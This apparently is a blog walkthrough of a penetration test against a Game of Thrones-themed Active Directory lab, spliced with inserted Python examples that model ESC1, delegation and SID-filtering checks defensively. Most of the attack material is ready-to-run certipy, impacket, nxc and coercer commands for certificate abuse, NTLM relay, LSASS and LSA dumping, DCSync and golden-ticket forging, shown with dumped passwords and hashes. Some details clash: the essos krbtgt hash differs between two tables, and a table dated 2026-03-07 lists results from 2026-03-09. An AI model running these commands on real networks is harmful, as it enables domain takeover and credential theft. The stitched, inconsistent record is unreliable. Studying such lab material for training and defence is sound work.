Reasoning: ESC1 is the most direct vulnerability: the template allows the requester to freely specify the Subject Alternative Name (SAN/UPN), and the certificate has Client Authentication EKU. This means any authenticated user can request a certificate that identifies itself as any other domain user — including Administrator. The CA signs it without verifying the real identity.
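The template-level conditions behind that reasoning, as an added example that is not part of the original report and not certipy's code: a checker that lists which ESC1 preconditions a template fails (an empty list means ESC1). The template records and the CA's published-template list are constructed for the demo and shaped like the LDAP attributes a template carries (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, EKU OIDs, enrollment SIDs); apart from the ESC1 template name, none of the values are read from the lab.

```python
# Added example (not from the original report or from certipy): the template
# conditions that make a finding ESC1, evaluated on constructed records.

# msPKI-Certificate-Name-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval"

# EKUs that let a certificate authenticate a principal (PKINIT / Schannel logon)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose Enroll right makes a template reachable by everyone
LOW_PRIV_WELL_KNOWN = {"S-1-1-0", "S-1-5-11"}    # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}                   # Domain Users, Domain Computers


def is_low_privileged(sid):
    return sid in LOW_PRIV_WELL_KNOWN or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_blockers(template, published_templates):
    """Return the conditions that keep a template from being ESC1.

    An empty list means every ESC1 precondition holds: a low-privileged
    principal can ask the CA for a certificate whose SAN it chooses and
    which is accepted for authentication.
    """
    blockers = []
    if template["name"] not in published_templates:
        blockers.append("not published on the CA")
    if not template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("enrollee cannot supply the subject/SAN")
    if template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if template["ra_signature"] > 0:
        blockers.append("authorized signature(s) required")
    ekus = template["ekus"]
    if ekus and not (ekus & AUTH_EKUS):     # an empty EKU set means any purpose
        blockers.append("no authentication EKU")
    if not any(is_low_privileged(s) for s in template["enroll_sids"]):
        blockers.append("no low-privileged principal has Enroll")
    return blockers


def find_esc1(templates, published_templates):
    return [t["name"] for t in templates if not esc1_blockers(t, published_templates)]


# Constructed records (not real LDAP output); DOMAIN_USERS is Domain Users of essos.local
DOMAIN_USERS = "S-1-5-21-1670807799-439666968-3082400961-513"
ESSOS_PUBLISHED = {"ESC1", "User", "WebServer", "ApprovedSAN"}
TEMPLATES = [
    {"name": "ESC1", "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signature": 0,
     "ekus": {"1.3.6.1.5.5.7.3.2"}, "enroll_sids": {DOMAIN_USERS}},
    # subject built from AD, so the requester cannot pick a UPN
    {"name": "User", "name_flag": 0x0, "enrollment_flag": 0x0, "ra_signature": 0,
     "ekus": {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"}, "enroll_sids": {DOMAIN_USERS}},
    # free SAN but a CA manager must approve each request
    {"name": "ApprovedSAN", "name_flag": 0x1, "enrollment_flag": 0x2, "ra_signature": 0,
     "ekus": {"1.3.6.1.5.5.7.3.2"}, "enroll_sids": {"S-1-5-11"}},
    # would be ESC1, but the CA does not publish it
    {"name": "Unpublished", "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signature": 0,
     "ekus": set(), "enroll_sids": {"S-1-1-0"}},
]

if __name__ == "__main__":
    print(find_esc1(TEMPLATES, ESSOS_PUBLISHED))
    for t in TEMPLATES:
        print(t["name"], esc1_blockers(t, ESSOS_PUBLISHED))
```

Each blocker is also the corresponding fix on the defensive side: clear the enrollee-supplies-subject flag, require manager approval or an RA signature, or restrict Enroll to the intended group.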

# 1. Request certificate with UPN = Administrator@essos.local
certipy-ad req \
  -u 'sql_svc@essos.local' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -dc-ip 10.5.10.12 -target 'braavos.essos.local' \
  -ca 'ESSOS-CA' -template 'ESC1' \
  -upn 'Administrator@essos.local' -out admin_essos

# 2. PKINIT: use the certificate to obtain TGT + NTLM hash
certipy-ad auth -pfx admin_essos.pfx -dc-ip 10.5.10.12 -domain essos.local

Result:

  • TGT obtained for Administrator@essos.local
  • NTLM Hash: 54296a48cd30259cc88095373cec24da

7.3 DCSync — Full essos.local dump

Command:

impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da \
  -just-dc-ntlm 'essos.local/Administrator@10.5.10.12'

Hashes obtained (essos.local):

| User | NTLM hash |
|------|-----------|
| Administrator | 54296a48cd30259cc88095373cec24da |
| krbtgt | 2efe5e7df093392a3cda08b0fab451e2 |
| daenerys.targaryen (DA) | 34534854d33b398b66684072224bb47a |
| viserys.targaryen | d96a55df6bef5e0b4d6d956088036097 |
| khal.drogo | 739120ebc4dd940310bc4bb5c9d37021 |
| jorah.mormont | 4d737ec9ecf0b9955a161773cfed9611 |
| missandei | 1b4fd18edf477048c7a7c32fda251cec |
| drogon | 195e021e4c0ae619f612fb16c5706bb6 |
| sql_svc | 84a5092f53390ea48d660be52b93b804 |

essos.local — DOMAIN COMPROMISED

7.4 Full attack chain toward essos.local DA

arya.stark:Needle (SMB share)
  → Authenticated LDAP → samwell.tarly:Heartsbane (description field)
  → Kerberoasting → jon.snow:iknownothing
  → NETLOGON → jeor.mormont:_L0ngCl@w_ (script.ps1)
  → NETLOGON → tywin.lannister:powerkingftw135 (secret.ps1 AES decrypt)
  → ForceChangePassword → jaime.lannister:Kingslayer1!
  → GenericWrite/Targeted Kerberoast → joffrey.baratheon:1killerlion
  → WriteDacl → tyron.lannister:Halfman1!
  → DRAGONSFRIENDS/GenericWrite → RBCD on BRAAVOS
  → S4U2Proxy as Administrator → secretsdump BRAAVOS
  → LSA Secret → sql_svc:YouWillNotKerboroast1ngMeeeeee
  → ADCS ESC1 → cert as Administrator@essos.local
  → PKINIT → NTLM hash Administrator
  → DCSync MEEREEN → all essos.local hashes

Phase 8 — BloodHound Enumeration (Full AD Graph)

8.1 BloodHound data collection

Reasoning: BloodHound collects relationships between AD objects (users, groups, computers, ACLs, delegations, sessions) and represents them as a directed graph. It identifies non-obvious attack paths through multiple hops that would be impossible to detect manually. bloodhound-python (ingestor for BloodHound Legacy 4.x) performs collection via LDAP and SMB directly from the attacker machine.

Two collections were performed:

  • Initial collection (2026-03-06): with arya.stark (NORTH), tywin.lannister (SEVEN), sql_svc (ESSOS)
  • Full collection (2026-03-07): with stronger credentials and LoggedOn to capture active sessions

Commands:

# NORTH — DC: winterfell.north.sevenkingdoms.local
bloodhound-python \
  -u 'arya.stark' -p 'Needle' \
  -d north.sevenkingdoms.local \
  -dc winterfell.north.sevenkingdoms.local \
  -ns 10.5.10.11 \
  --auth-method ntlm --dns-tcp \
  -c All,LoggedOn --zip --dns-timeout 30
# Output: bloodhound/north/20260307092022_bloodhound.zip

# SEVENKINGDOMS — DC: kingslanding.sevenkingdoms.local
bloodhound-python \
  -u 'tywin.lannister' -p 'powerkingftw135' \
  -d sevenkingdoms.local \
  -dc kingslanding.sevenkingdoms.local \
  -ns 10.5.10.10 \
  --auth-method ntlm --dns-tcp \
  -c All,LoggedOn --zip --dns-timeout 30
# Output: bloodhound/seven/20260307092024_bloodhound.zip

# ESSOS — DC: meereen.essos.local (with Administrator hash)
bloodhound-python \
  -u 'Administrator@essos.local' \
  --hashes 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' \
  -d essos.local \
  -dc meereen.essos.local \
  -ns 10.5.10.12 \
  --auth-method ntlm --dns-tcp \
  -c All,LoggedOn --zip --dns-timeout 30
# Output: bloodhound/essos/20260307092053_bloodhound.zip

Technical note: Initial runs failed with dns.resolver.LifetimeTimeout because bloodhound-python performs an SRV query _ldap._tcp.dc._msdcs.<domain> before authenticating, and the DCs responded with timeout over UDP (fragmented or filtered response). Fix: --dns-tcp forces DNS queries over TCP, avoiding the UDP fragmentation issue.

Objects collected per domain:

| Domain | Users | Groups | Computers | GPOs | Containers | Trusts |
|--------|-------|--------|-----------|------|------------|--------|
| north.sevenkingdoms.local | 17 | 51 | 2 | 3 | 19 | 1 |
| sevenkingdoms.local | 39 | 80 | 2 | 2 | 20 | 2 |
| essos.local | 14 | 60 | 3 | 3 | 22 | 1 |

Active sessions detected (LoggedOn):

| Host | Logged-on user SID | Domain |
|------|--------------------|--------|
| CASTELBLACK (10.5.10.22) | S-1-5-21-2438291940-3241590632-3318250954-1000 | LOCAL (localuser) |
| CASTELBLACK (10.5.10.22) | S-1-5-21-538662962-1941845892-1248869276-1121 | NORTH |
| WINTERFELL (10.5.10.11) | S-1-5-21-538662962-1941845892-1248869276-1000 | NORTH (localuser) |
| THE-EYRIE (10.5.10.21) | S-1-5-21-1250230970-3196869652-16397850-1000 | SEVEN |
| KINGSLANDING (10.5.10.10) | S-1-5-21-317062497-992263240-1765608987-1000 | SEVEN |
| BRAAVOS (10.5.10.23) | S-1-5-21-1670807799-439666968-3082400961-1119 | ESSOS |
| MEEREEN (10.5.10.12) | S-1-5-21-1670807799-439666968-3082400961-1000 | ESSOS |

8.2 Key findings from the BloodHound graph

8.2.1 ACLs on protected groups (blocked by SDProp)

Groups STARK, NIGHT WATCH and MORMONT appear in BloodHound with GenericAll over Domain Admins@NORTH, Account Operators@NORTH and Enterprise Admins@SEVEN. These ACEs are not present in the live DACLs: all three targets are protected groups, and SDProp (Security Descriptor Propagation) re-applies the AdminSDHolder DACL to them every 60 minutes, stripping the extra ACEs. The BloodHound data was collected before SDProp had run.

Impact: the shortest paths to DA that BloodHound shows rest on these ACEs and do not exist at exploitation time. Blocked. Before acting on any BloodHound edge that ends on a protected group, re-read the target's DACL live (impacket-dacledit with its default read action) instead of trusting the collection snapshot.

8.2.2 brandon.stark — Kerberos pre-authentication disabled (AS-REP Roastable)

Authenticated LDAP enumeration revealed that brandon.stark has the UF_DONT_REQUIRE_PREAUTH flag set, so the KDC returns an AS-REP encrypted with his hash without requiring a password.

nxc ldap 10.5.10.11 -u 'arya.stark' -p 'Needle' -d north.sevenkingdoms.local --asreproast /tmp/asrep_north.txt

AS-REP hash captured. Cracking attempt with rockyou: not cracked (0.34% traversed — stopped). brandon.stark has no known special privileges in AD (no privileged group, no outbound ACEs).

8.2.3 Constrained delegation: CASTELBLACK$ → HTTP/winterfell

Critical finding: The CASTELBLACK$ object has msDS-AllowedToDelegateTo configured with:

  • HTTP/winterfell
  • HTTP/winterfell.north.sevenkingdoms.local

This means CASTELBLACK$ can use S4U2Proxy to obtain HTTP service tickets on behalf of any user toward WINTERFELL. The SPN HTTP/winterfell.north.sevenkingdoms.local matches exactly what WinRM (port 5985) uses, which would allow obtaining a WinRM session as Administrator@north.sevenkingdoms.local on WINTERFELL.

CASTELBLACK$ UAC: 4096 (WORKSTATION_TRUST_ACCOUNT) — no TrustedToAuthForDelegation (0x1000000).

8.2.4 Unconstrained delegation: WINTERFELL$

WINTERFELL$ (DC) is the only NORTH host with unconstrained delegation, which is expected for a domain controller. No member computers have unconstrained delegation, so the classic “Printer Bug + Unconstrained Delegation” vector is not applicable without first compromising the DC.


Phase 9 — Attempted Domain Admin NORTH via Constrained Delegation

9.1 Obtaining the CASTELBLACK$ hash

Reasoning: To exploit the constrained delegation of CASTELBLACK$, we need its Kerberos credentials. Since jeor.mormont has local admin on CASTELBLACK (WinRM Pwn3d!), we dump the LSA secrets containing the machine account hash, stored encrypted in the registry under HKLM\SECURITY\Policy\Secrets.

nxc smb 10.5.10.22 -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local --lsa

Result:

| LSA secret | Value |
|------------|-------|
| NORTH\CASTELBLACK$ NT hash | 6bb93484ecd8a57205f74f6b2c870872 |
| NORTH\CASTELBLACK$ AES256 | e8f8c78a66c706e60fe4e5fe1cdd38c8d0487099bd327d21ff5233107a6ecd60 |
| NORTH\CASTELBLACK$ AES128 | 847a5e0a855e707423d4fdbaea6185e6 |
| NORTH\sql_svc cached DCC2 | 89e701ebbd305e4f5380c5150494584a |
| NORTH\sql_svc plaintext | YouWillNotKerboroast1ngMeeeeee |
| localuser | password |

9.2 S4U2Self + S4U2Proxy attempt toward WINTERFELL

Reasoning: With the AES256 key of CASTELBLACK$ we attempt the S4U2Self flow (obtain a service ticket on behalf of Administrator against CASTELBLACK$) followed by S4U2Proxy (convert it into a ticket for HTTP/winterfell.north.sevenkingdoms.local as Administrator), which would give us WinRM on WINTERFELL.

impacket-getST \
  -dc-ip 10.5.10.11 \
  -spn 'HTTP/winterfell.north.sevenkingdoms.local' \
  -impersonate 'Administrator' \
  -aesKey 'e8f8c78a66c706e60fe4e5fe1cdd38c8d0487099bd327d21ff5233107a6ecd60' \
  'north.sevenkingdoms.local/CASTELBLACK$'

Error: KDC_ERR_BADOPTION — Probably SPN is not allowed to delegate by user CASTELBLACK$ or initial TGT not forwardable

Analysis: Classic constrained delegation (via msDS-AllowedToDelegateTo) requires S4U2Self to generate a forwardable ticket for use in S4U2Proxy. This only occurs if the account has the TrustedToAuthForDelegation flag (0x1000000) set in its UAC, which enables protocol transition. CASTELBLACK$ has UAC 4096 (WORKSTATION_TRUST_ACCOUNT only), without that flag. The KDC issues S4U2Self as non-forwardable and rejects S4U2Proxy.

Status: Blocked. Two ways to unblock it: (a) add TrustedToAuthForDelegation to CASTELBLACK$'s userAccountControl, which requires write privileges over that object and is an AD modification needing explicit approval per RoE; (b) leave AD untouched and obtain a forwardable service ticket that a real user presents to CASTELBLACK (Kerberos-only constrained delegation consumes the user's ticket instead of an S4U2Self one), then hand it to S4U2Proxy with impacket-getST -additional-ticket.
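The reasoning in 8.2.3 and 9.2 reduced to code, as an added example that is not part of the original report and not impacket's code: decode the delegation bits of a computer account's userAccountControl and predict whether an S4U2Self + S4U2Proxy chain will be accepted for a given SPN. It goes one step beyond the page by also classifying unconstrained delegation. The CASTELBLACK$ inputs (UAC 4096 and the two msDS-AllowedToDelegateTo entries) are the values reported above; the WINTERFELL$ UAC value is assumed (a DC's usual SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION), not read from the lab.

```python
# Added example (not from the original report or from impacket): decode
# delegation-related userAccountControl bits and predict the KDC's answer to
# S4U2Proxy. The WINTERFELL$ UAC below is an assumed typical DC value.

# userAccountControl bits (MS-SAMR / MS-ADTS)
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_DONT_REQUIRE_PREAUTH = 0x400000             # AS-REP roastable
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("any protocol")


def delegation_profile(uac, allowed_to_delegate_to=()):
    """Summarise what an account may do with delegation."""
    if uac & UF_TRUSTED_FOR_DELEGATION:
        kind = "unconstrained"
    elif allowed_to_delegate_to:
        kind = "constrained"
    else:
        kind = "none"
    return {
        "kind": kind,
        "protocol_transition": bool(uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION),
        "targets": {s.lower() for s in allowed_to_delegate_to},
        "asrep_roastable": bool(uac & UF_DONT_REQUIRE_PREAUTH),
    }


def s4u_expectation(profile, target_spn, have_forwardable_user_ticket=False):
    """Predict the KDC's answer to S4U2Proxy for target_spn.

    have_forwardable_user_ticket: a forwardable service ticket that a real user
    presented to this account, which Kerberos-only constrained delegation uses
    in place of the S4U2Self ticket.
    """
    if profile["kind"] == "unconstrained":
        return "ok: any SPN, but a victim TGT must be captured first (no S4U needed)"
    if profile["kind"] == "none":
        return "KDC_ERR_BADOPTION: account has no delegation rights"
    if target_spn.lower() not in profile["targets"]:
        return "KDC_ERR_BADOPTION: SPN not listed in msDS-AllowedToDelegateTo"
    if profile["protocol_transition"] or have_forwardable_user_ticket:
        return "ok: forwardable ticket available for S4U2Proxy"
    return ("KDC_ERR_BADOPTION: S4U2Self ticket is not forwardable without "
            "TrustedToAuthForDelegation; supply a real user's forwardable ticket instead")


CASTELBLACK = delegation_profile(
    4096, ["HTTP/winterfell", "HTTP/winterfell.north.sevenkingdoms.local"])
WINTERFELL = delegation_profile(UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION)  # assumed

if __name__ == "__main__":
    spn = "HTTP/winterfell.north.sevenkingdoms.local"
    print(CASTELBLACK)
    print(s4u_expectation(CASTELBLACK, spn))
    print(s4u_expectation(CASTELBLACK, spn, have_forwardable_user_ticket=True))
    print(s4u_expectation(
        delegation_profile(4096 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION, CASTELBLACK["targets"]), spn))
```

The SPN check here is an exact match against msDS-AllowedToDelegateTo, which is what the KDC enforces for the request; since the service class in a ticket's sname is not protected, a ticket for HTTP/winterfell can be rewritten for another service on the same host (impacket-getST -altservice), but that does not help with the forwardable-ticket problem above.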

9.3 Active session check on CASTELBLACK (LSASS)

Reasoning: If any Domain Admin has recently logged in to CASTELBLACK, their credentials might be cached in LSASS. The lsassy module combines creating an LSASS dump (via comsvcs.dll, ProcDump or other methods) with in-memory analysis to extract cleartext credentials or hashes.

nxc smb 10.5.10.22 -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local -M lsassy

Result: Only sql_svc:YouWillNotKerboroast1ngMeeeeee and CASTELBLACK\localuser:password — no DA with active session on CASTELBLACK at this time.


Accumulated Valid Credentials (current state — 2026-03-07)

| User | Password / NT Hash | Domain | Source | Shell access |
|---|---|---|---|---|
| arya.stark | Needle | north.sevenkingdoms.local | SMB share (arya.txt) | |
| samwell.tarly | Heartsbane | north.sevenkingdoms.local | LDAP description | |
| jon.snow | iknownothing | north.sevenkingdoms.local | Kerberoasting | |
| jeor.mormont | `_L0ngCl@w_` | north.sevenkingdoms.local | NETLOGON script.ps1 | WinRM CASTELBLACK (Pwn3d!) |
| sql_svc | YouWillNotKerboroast1ngMeeeeee | north/essos | LSA Secret BRAAVOS | MSSQL CASTELBLACK + BRAAVOS |
| CASTELBLACK$ | NT:6bb93484ecd8a57205f74f6b2c870872 / AES256:e8f8c78a66c706e60fe4e5fe1cdd38c8d0487099bd327d21ff5233107a6ecd60 | north.sevenkingdoms.local | LSA dump (jeor.mormont admin) | — (machine account) |
| tywin.lannister | powerkingftw135 | sevenkingdoms.local | NETLOGON secret.ps1 (AES decrypt) | SMB THE-EYRIE |
| jaime.lannister | Kingslayer1! | sevenkingdoms.local | ForceChangePassword (tywin) | |
| joffrey.baratheon | 1killerlion | sevenkingdoms.local | Targeted Kerberoast (jaime) | |
| tyron.lannister | Halfman1! / Halfman123 | sevenkingdoms.local | WriteDacl (joffrey) | |
| CASTELBLACK\localuser | password | LOCAL (CASTELBLACK) | LSA DefaultPassword | |
| essos\Administrator | NT:54296a48cd30259cc88095373cec24da | essos.local | ADCS ESC1 + PKINIT | DCSync MEEREEN (Pwn3d!) |
| essos\krbtgt | NT:a4d3a80b0f56194ee15d70c5cad86330 | essos.local | DCSync MEEREEN | Golden ticket ESSOS |
| essos\daenerys.targaryen | NT:34534854d33b398b66684072224bb47a | essos.local | DCSync MEEREEN | |
| north\Administrator | NT:dbd13e1c4e338284ac4e9874f7de6ef4 | north.sevenkingdoms.local | ESC8 relay WINTERFELL$ + PKINIT + DCSync | DCSync WINTERFELL (Pwn3d!) |
| north\krbtgt | NT:757bb534955f0afd2cd07b01d72ab606 | north.sevenkingdoms.local | DCSync WINTERFELL | Golden ticket NORTH |
| WINTERFELL$ | NT:63685a768c0c63437d203964aa024ba4 | north.sevenkingdoms.local | ESC8 relay NTLM → SEVENKINGDOMS-CA | PKINIT DC machine account |
| sevenkingdoms\Administrator | NT:c66d72021a2d4744409969a581a1705e | sevenkingdoms.local | Inter-realm golden ticket (NORTH krbtgt + trust key ExtraSids) + NTDS dump | DCSync KINGSLANDING (Pwn3d!) |
| sevenkingdoms\krbtgt | NT:3782992c5f73d84642ca7355618d259b | sevenkingdoms.local | DCSync KINGSLANDING | Golden ticket SEVEN |

Objective Status

| Objective | Status |
|---|---|
| Domain Admin north.sevenkingdoms.local | Completed ✓ — ESC8 WINTERFELL$ cert → PKINIT → DCSync |
| Domain Admin sevenkingdoms.local | Completed ✓ — ExtraSids inter-realm golden ticket → NTDS dump |
| Compromise essos.local | Completed ✓ — ADCS ESC1 → PKINIT → DCSync |
| SYSTEM on CASTELBLACK | Completed ✓ — GodPotato via MSSQL xp_cmdshell |

Phase 10 — Domain Admin All Domains (2026-03-09)

10.1 ESC8 Relay — WINTERFELL$ certificate via NTLM relay to SEVENKINGDOMS-CA

Technique: Coerced WINTERFELL$ (the north.sevenkingdoms.local DC) via MS-EFSR using Coercer from the Linux attacker machine. certipy-ad relay listening on 198.51.100.2:445 relayed the NTLM authentication to the SEVENKINGDOMS-CA HTTP enrollment endpoint (ESC8 — Web Enrollment over HTTP) and obtained a certificate on the KerberosAuthentication template for WINTERFELL$.

certipy-ad relay -target "http://10.5.10.10" -template 'KerberosAuthentication' \
  -interface 198.51.100.2 -forever
coercer coerce -l 198.51.100.2 -t 10.5.10.11 \
  -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local --always-continue

Result: winterfell$_north$_north.pfx — certificate for WINTERFELL$ with DNS SANs for north.sevenkingdoms.local

10.2 PKINIT — WINTERFELL$ machine account NT hash

certipy-ad auth -pfx 'winterfell$_north$_north.pfx' -dc-ip 10.5.10.11 \
  -domain north.sevenkingdoms.local -username 'winterfell$'
# WINTERFELL$ NT hash: 63685a768c0c63437d203964aa024ba4

10.3 DCSync north.sevenkingdoms.local

DC machine accounts have replication rights — WINTERFELL$ can DCSync its own domain.

impacket-secretsdump \
  -hashes aad3b435b51404eeaad3b435b51404ee:63685a768c0c63437d203964aa024ba4 \
  -just-dc-ntlm 'north.sevenkingdoms.local/WINTERFELL$@10.5.10.11'
# north\Administrator: dbd13e1c4e338284ac4e9874f7de6ef4
# north\krbtgt:        757bb534955f0afd2cd07b01d72ab606

10.4 ExtraSids — Inter-realm golden ticket for sevenkingdoms.local

Used the inter-domain trust key (the NT hash of the SEVENKINGDOMS$ trust account held in NORTH) to forge a referral TGT whose ExtraSids carries the SID of SEVEN's Enterprise Admins group (S-1-5-21-569288976-153438785-3228255649-519).

# Forge inter-realm TGT with NORTH krbtgt + trust account key
# -nthash is the SEVENKINGDOMS$ trust key from the NORTH DCSync
impacket-ticketer \
  -nthash f2e163e48e7bc75a94aaa1be71af80be \
  -domain north.sevenkingdoms.local \
  -domain-sid S-1-5-21-1439377769-504837373-443698742 \
  -extra-sid S-1-5-21-569288976-153438785-3228255649-519 \
  -spn krbtgt/sevenkingdoms.local \
  Administrator

# Exchange for CIFS service ticket on KINGSLANDING
impacket-getST -k -no-pass -spn 'cifs/kingslanding.sevenkingdoms.local' \
  -dc-ip 10.5.10.10 'sevenkingdoms.local/Administrator'

# Dump SEVEN Administrator hash
nxc smb 10.5.10.10 -k --use-kcache --ntds --user 'sevenkingdoms\administrator'
# sevenkingdoms\Administrator: c66d72021a2d4744409969a581a1705e
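To show what the ExtraSids step in 10.4 relies on from the receiving side, here is an added Python example (written for this page, not part of the original report or of GOAD) that parses SIDs and applies the rule SID filtering enforces on a quarantined trust: any SID in the inbound PAC whose domain part is not the trusted domain's own SID is dropped. The NORTH domain SID and the SEVEN Enterprise Admins SID are the two values used in 10.4; the NORTH Domain Admins SID and the function names are constructed for the example. The check is the one applied on external and forest trusts with quarantine enabled; intra-forest parent/child trusts such as NORTH to SEVEN do not apply it by default, which is why the referral ticket above is honoured.

```python
# Added example (not from the original report): parse Windows account SIDs and
# model the SID-filtering decision a trust applies to ExtraSids in an inbound
# referral TGT. NORTH_DOMAIN_SID and SEVEN_EA_SID come from section 10.4; the
# NORTH Domain Admins SID below is constructed for illustration.
import re

# Fixed RIDs that every domain SID shares (only a few are listed).
WELL_KNOWN_RIDS = {
    500: "Administrator",
    502: "krbtgt",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Values from the report (10.4).
NORTH_DOMAIN_SID = "S-1-5-21-1439377769-504837373-443698742"
SEVEN_EA_SID = "S-1-5-21-569288976-153438785-3228255649-519"
# Constructed for the example: NORTH's own Domain Admins group.
NORTH_DA_SID = NORTH_DOMAIN_SID + "-512"

_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")


def parse_sid(sid: str) -> tuple[str, int]:
    """Split a domain account SID S-1-5-21-a-b-c-RID into (domain SID, RID).

    Only the S-1-5-21 form is handled; anything else raises ValueError so a
    caller never silently treats a malformed value as "same domain".
    """
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid}")
    rid_text = m.group(1)
    return sid[: -(len(rid_text) + 1)], int(rid_text)


def describe_sid(sid: str) -> str:
    """Human-readable form: domain, RID and well-known group name if any."""
    domain, rid = parse_sid(sid)
    return f"{domain} RID {rid} ({WELL_KNOWN_RIDS.get(rid, 'user/group')})"


def filter_extra_sids(trusted_domain_sid: str, extra_sids: list[str]) -> tuple[list[str], list[str]]:
    """SID filtering: keep SIDs from the trusted (issuing) domain, drop the rest.

    Returns (kept, dropped). A SID whose domain part differs from the trusted
    domain's SID can only have been injected (SIDHistory or a forged PAC) and
    is discarded by a quarantined trust.
    """
    kept, dropped = [], []
    for sid in extra_sids:
        domain, _ = parse_sid(sid)
        (kept if domain == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def pac_group_names(trusted_domain_sid: str, extra_sids: list[str], filtering: bool) -> list[str]:
    """Well-known group names the receiving domain would honour from ExtraSids,
    with or without SID filtering on the trust."""
    sids = filter_extra_sids(trusted_domain_sid, extra_sids)[0] if filtering else list(extra_sids)
    return [WELL_KNOWN_RIDS.get(parse_sid(s)[1], "user/group") for s in sids]


if __name__ == "__main__":
    extra = [SEVEN_EA_SID, NORTH_DA_SID]
    for s in extra:
        print(describe_sid(s))
    kept, dropped = filter_extra_sids(NORTH_DOMAIN_SID, extra)
    print("kept by SID filtering:   ", kept)
    print("dropped by SID filtering:", dropped)
    print("groups honoured, no filtering:  ", pac_group_names(NORTH_DOMAIN_SID, extra, filtering=False))
    print("groups honoured, with filtering:", pac_group_names(NORTH_DOMAIN_SID, extra, filtering=True))
```

Run stand-alone it shows that the SEVEN Enterprise Admins SID survives only when the trust does not filter, while NORTH's own Domain Admins SID passes either way. The same parse-and-compare logic is what a detection rule or a trust-configuration review would apply: a PAC arriving over a trust that carries a RID-519 SID from a domain other than the issuer's is a forged or SIDHistory-injected ticket, and `netdom trust /quarantine:yes` (or keeping such privileged accounts out of child-domain trust paths altogether) is the configuration-side mitigation.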

10.5 DCSync sevenkingdoms.local

impacket-secretsdump \
  -hashes aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e \
  -just-dc-ntlm 'sevenkingdoms.local/Administrator@10.5.10.10'
# seven\krbtgt: 3782992c5f73d84642ca7355618d259b
This post is licensed under CC BY 4.0 by the author.